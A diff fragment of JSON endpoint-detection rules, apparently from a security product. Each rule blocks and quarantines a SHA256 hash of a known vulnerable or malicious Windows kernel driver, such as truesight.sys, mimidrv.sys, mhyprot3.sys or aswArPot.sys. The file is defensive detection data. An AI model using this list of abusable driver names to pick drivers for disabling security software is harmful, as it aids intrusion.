"2026-03-23T11:45:31.140347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b33b3a531fc9b0d0353b218a6b0abfdf4094c8eec8b7403da1088eb9916f4741", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4ee88a1-4146-5737-ac5b-be1589934f0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161111Z", + "creation_date": "2026-03-23T11:45:31.161113Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "716d44fbbb56c412b9307a7e5d666d1e166e8d2fa3e5e07cf34e9c5bdc4770ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "d503b77e-f329-50c3-a63f-151e515a02c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466157Z", + "creation_date": "2026-03-23T11:45:30.466160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d51a04e4-66c5-5bbb-8d46-0b31a85a8104", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813667Z", + "creation_date": "2026-03-23T11:45:31.813669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813674Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fd8ec1bd57418e63f9f752ed48e5183221543fd5e4d8b2dba60fa8590433978", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d52667b7-fe4b-5476-aa1e-eefabe930e5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984564Z", + "creation_date": "2026-03-23T11:45:29.984566Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e96edcd1d5daeb7cbbc2602e9cdf2fd6723cbde0cfcf65eded6d02b58c58473", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d53903c7-00b6-53f5-99f6-1a0abdc55de4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488759Z", + "creation_date": "2026-03-23T11:45:31.488761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "045df00af2228ec0219665623a5a6145e9a55e39d88e0b916dfcfd1de3186efb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d546c29e-4f59-5ca0-9608-9642a9dd0923", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458022Z", + "creation_date": "2026-03-23T11:45:30.458025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f77fe6b1e0e913ac109335a8fa2ac4961d35cbbd50729936059aba8700690a9e", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d547e928-c81e-5089-887d-6b306a6cbc9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145344Z", + "creation_date": "2026-03-23T11:45:32.145348Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fdf15402013191f701086e188d88041481f1562aa43e4ca8a21f4d489e791a36", + "comment": "Vulnerable Kernel Driver (aka SeasunProtect.sys) [https://www.loldrivers.io/drivers/3a9ea9a6-e5e3-439a-b892-1f78dd990099/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d54de769-b192-5f54-89ae-caa79107b1bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.968060Z", + "creation_date": "2026-03-23T11:45:29.968062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71a12491b91eff58d2c834160bf8eb03be2e78548c9d06f435b31d9e7dcaecd8", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d563ccb2-9a1e-5c5d-976f-06fbf2b613a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978597Z", + "creation_date": "2026-03-23T11:45:29.978599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "635273eaa4c2e20c4ec320c6c8447ce2e881984e97c9ed6aeec4fad16b934e81", + "comment": "Vulnerable Kernel Driver (aka bwrsh.sys) [https://www.loldrivers.io/drivers/974de971-1f78-47b9-8049-6c34f294acd5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d575975a-d1be-5e7f-ab24-10783b482040", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452217Z", + "creation_date": "2026-03-23T11:45:30.452221Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b531f0a11ca481d5125c93c977325e135a04058019f939169ce3cdedaddd422d", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5a842a5-67e6-5e8b-bde2-a999c285fd5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156518Z", + "creation_date": "2026-03-23T11:45:31.156519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156525Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db77b9e868b942f5a4e7779e210b73699ff8f26dc7e92acc39ddc614e73374e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5ab7150-9289-5e04-85b4-e6aa51a17667", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613858Z", + "creation_date": "2026-03-23T11:45:29.613860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15bc804877a607ba0d017df9f6ac951ac7ffbcca8069c5ba28e0cf505f7553b8", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5b2b465-2733-5f3b-98ff-edbdaa4f1e2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493569Z", + "creation_date": "2026-03-23T11:45:31.493572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493581Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb27b99f572f95051a227285e5adbc4c4135952f8b54323a3b9c19bda2082ab2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5b8bb83-4dc4-58c5-a900-2599dc102649", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616686Z", + "creation_date": "2026-03-23T11:45:29.616688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5c10855-2efd-5a3a-962a-4ecddd197f77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143224Z", + "creation_date": "2026-03-23T11:45:32.143226Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143231Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5c67434-06e4-5fb0-aca7-c87df30dda42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459985Z", + "creation_date": "2026-03-23T11:45:30.459988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "516159871730b18c2bddedb1a9da110577112d4835606ee79bb80e7a58784a13", + "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5d7fd6e-ebd8-565b-add0-af8148705c4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831218Z", + "creation_date": "2026-03-23T11:45:30.831221Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d7b33f39fb712a114231a1ecf58d45f08eb6d4100556f24cd55bc3468a5b9fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5db8dcf-d2b3-55b4-897e-bcdc8d1aa417", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143580Z", + "creation_date": "2026-03-23T11:45:31.143582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bcd8bd506d8390fdf85aa91ef40b359001cb09e9c45696c31ff5289c422a846", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5ea6323-e034-5703-bbde-bff56bfae436", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834132Z", + "creation_date": 
"2026-03-23T11:45:30.834135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "699e84d8ff00dff1056c826b06f8d9514cbc5316c6087a3badb5654ee7e4c217", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d5f85186-cbe9-5919-b46e-6ab01af72170", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500148Z", + "creation_date": "2026-03-23T11:45:31.500151Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e6e5e688c858122474f0f37d8dd28a7daf57fb6962312b30ec88a1c077dad14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "d5fb55f4-fcb7-59a5-8ec0-ab3d97a3ab19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968910Z", + "creation_date": "2026-03-23T11:45:29.968912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34e0364a4952d914f23f271d36e11161fb6bb7b64aea22ff965a967825a4a4bf", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d61a06c9-d5ba-50c0-97d8-ad9e24b7fc9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835405Z", + "creation_date": "2026-03-23T11:45:30.835408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.835417Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a86b668e2380d290a8c6dbaf06ab2582647d7badc69cfaedb9bff4d7cdd26cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d631d6b0-5bcc-5a43-a717-503732debd1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822300Z", + "creation_date": "2026-03-23T11:45:30.822302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10576dad4928b01c21ecd2ed9914abba8bf4edae964d5d9d3c0d64ec7657f3d3", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d63a9d72-d64b-509b-96b6-b12ed14c1883", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818225Z", + "creation_date": "2026-03-23T11:45:30.818227Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818233Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8edab185e765f9806fa57153db1ede00e68270d2351443ee1de30674eca8d9b6", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 